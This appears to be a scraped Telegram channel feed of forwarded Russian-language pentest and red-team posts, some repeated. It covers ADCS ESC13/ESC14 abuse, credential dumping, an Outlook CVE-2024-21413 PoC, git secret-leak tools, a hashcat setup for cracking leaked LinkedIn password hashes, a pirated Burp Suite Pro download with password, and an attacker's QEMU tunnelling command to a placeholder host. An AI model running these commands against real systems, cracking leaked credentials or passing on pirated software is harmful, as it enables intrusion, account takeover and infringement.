Forwarded from Ralf Hacker Channel (Ralf Hacker)
Так, ADCS ESC13
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
SpecterOps
ADCS ESC13 Abuse Technique - SpecterOps
How to defend against ADCS abuse: ESC13 and beyond. Learn how attackers exploit Active Directory Certificate Services to escalate privileges.
Forwarded from SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
Forwarded from Cult Of Wire
Для проверки Docker-образов на уязвимости есть хороший инструмент - Trivy. Сам использую и другим советую. Но сейчас не про него. Trivy хоть и хороший инструмент, но покрывает только поиск уязвимостей.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
Или так:
Кроме того есть возможность вывод отчёта в json файл c помощью
В контейнере можно сделать так:
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} goodwithtech/dockle-test:v2
Или так:
export DOCKLE_LATEST=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
)
docker run --rm goodwithtech/dockle:v${DOCKLE_LATEST} goodwithtech/dockle-test:v2Кроме того есть возможность вывод отчёта в json файл c помощью
-f json -o report_name.json:dockle -f json -o dockle_report.json goodwithtech/dockle-test:v2
В контейнере можно сделать так:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} -f json goodwithtech/dockle-test:v2 > dockle_report.json
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
GitHub
GitHub - goodwithtech/dockle: Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start
Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start - goodwithtech/dockle
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
Forwarded from AP Security
#poc #cve #exploit
Microsoft Outlook RCE: PoC🤖
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Microsoft Outlook RCE: PoC
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
💘1
Forwarded from burpsuite (not official)
burpsuite_pro_v2024.1.1.1.zip
692.3 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
👨💻2
Forwarded from Кавычка (Bo0oM)
Быстро и дешево брутим хэши
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
sudo apt-get update
sudo apt-get install gcc make tmux git mesa-common-dev cmake nvidia-cuda-toolkit build-essential unzip -y
https://ru.download.nvidia.com/XFree86/Linux-x86_64/470.63.01/NVIDIA-Linux-x86_64-470.63.01.run
chmod +x NVIDIA-Linux-x86_64-470.63.01.run
sudo ./NVIDIA-Linux-x86_64-470.63.01.run
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
👨💻2
Forwarded from PT SWARM
PortSwigger's Top 10 web hacking techniques of 2023!
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
👾2
Forwarded from Интернет-Розыск
Ну и для облегчения исследования доменных имен...
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
❤1
Forwarded from #Arm1tage
Git утечки
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
python3 GitDorker.py -tf TOKENSFILE -q tesla.com -d Dorks/DORKFILE -o tesla
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
github-dork.py -r techgaun/github-dorks
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
./git_dumper.py http://website.com/.git ~/website
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
trufflehog git https://github.com/trufflesecurity/trufflehog.git
trufflehog github --repo=https://github.com/trufflesecurity/test_keys
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
❤2
Forwarded from true_security
Написал немного заметок про zabbix и интересные возможности.
читать
читать
Telegraph
заметки про zabbix
Иногда на тестах есть доступ к заббиксу с ограниченными правами, я покажу некоторые интересные вещи на примере заббикса на standoff365. У нас есть доступ к заббиксу с ограниченными правами, доступен только один хост, как на скрине: В самом заббиксе на мониторинге…
❤2
Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
ADCS ESC 14...
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9
А еще много будет?
#ad #redteam #pentest #adcs
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9
А еще много будет?
#ad #redteam #pentest #adcs
SpecterOps
ADCS ESC14 Abuse Technique - SpecterOps
This blog post explores the various ways of abusing ADCS explicit certificate mapping, categorized as ESC14. Learn how weak explicit mappings can pose a serious risk.
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Forwarded from PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
❤1🔥1
Forwarded from PurpleBear (Vadim Shelest)
Network tunneling with… QEMU?
Существует множество техник и инструментов для проксирования и создания туннелей в рамках
В блоге Securelist by Kaspersky опубликованы подробности техники использования киберзлодеями -
Суть техники заключается в создании
Другими словами подобная схема позволяет использовать созданные интерфейсы
🖇 References:
☑️ Network Pivoting Techniques
☑️ Сергей Зыбнев: туннельное мышление, или Разбираемся с pivoting
☑️ Caster - MikroTik Nightmare
#pivoting #QEMU
Существует множество техник и инструментов для проксирования и создания туннелей в рамках
Pivoting, которые позволяют атакующему получить доступ к локальным ресурсам, по сути, делая маршрутизируемым тот трафик, который в нормальных условиях не является маршрутизируемым😎 Но часто бывает, что нет возможности тащить что-то на отломанный хост, или архитектура процессора, ОС или ограниченные ресурсы этого просто не позволяют (например, в случаях с IoT девайсами🙈) Или вам просто очень нравится концепция LOTL и вы не боитесь экспериментов🔬В блоге Securelist by Kaspersky опубликованы подробности техники использования киберзлодеями -
QEMU в качестве инструмента для туннелирования. Для справки QEMU - это эмулятор аппаратного обеспечения различных платформ, позволяющий запускать различные гостевые операционные системы, другими словами это платформа программной виртуализации. Суть техники заключается в создании
network backend -netdev user, socket, hubport интерфейсов для создания туннелей к другим QEMU-виртуалкам внутри и за пределами сети с использованием network stack хоста qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev
socket,id=sock,connect=<IP>:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev
hubport,id=port-sock,hubid=0,netdev=sock -nographicДругими словами подобная схема позволяет использовать созданные интерфейсы
QEMU для классического туннелирования трафика, к тому же согласно документации QEMU поддерживает TAP, а значит по идее позволяет проводит L2 атаки😎 🖇 References:
☑️ Network Pivoting Techniques
☑️ Сергей Зыбнев: туннельное мышление, или Разбираемся с pivoting
☑️ Caster - MikroTik Nightmare
#pivoting #QEMU
Securelist
Network tunneling with… QEMU?
While investigating an incident, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the QEMU hardware emulator.
👨💻1